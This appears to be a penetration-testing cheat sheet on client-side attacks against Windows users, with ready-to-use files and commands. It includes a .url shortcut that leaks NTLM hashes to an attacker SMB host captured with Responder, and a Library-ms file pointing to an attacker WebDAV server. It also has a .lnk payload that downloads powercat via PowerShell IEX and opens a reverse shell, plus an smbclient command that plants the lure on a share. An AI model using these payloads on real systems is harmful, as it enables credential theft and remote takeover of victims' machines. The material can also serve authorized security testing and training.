Use this tool to generate various types of files required for client side attacks.
{% embed url="https://github.com/Greenwolf/ntlm_theft" %}
.url file to put in shares, upload in file upload, etc.
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\192.168.45.236\%USERNAME%.icon
IconIndex=1
Name this starting with @ so that it shows up on top like @evil.url
Listen with responder:
sudo responder -I tun0 -A
Useful to put in shares or in a folder where it is accessible by file explorer. Name it something like config.Library-ms
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://ip-here</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
We can create a webdav server so that we can access the webdav server upn double clicking the config.Library-ms file:
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/
Now we can create a .lnk file called something like automatic_configuration.lnk in the webdav folder
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<ip>:<port>/powercat.ps1');
powercat -c <ip> -p <port> -e powershell"
Now we can put the config.Library-ms file in the share:
smbclient //<ip>/share -c 'put config.Library-ms'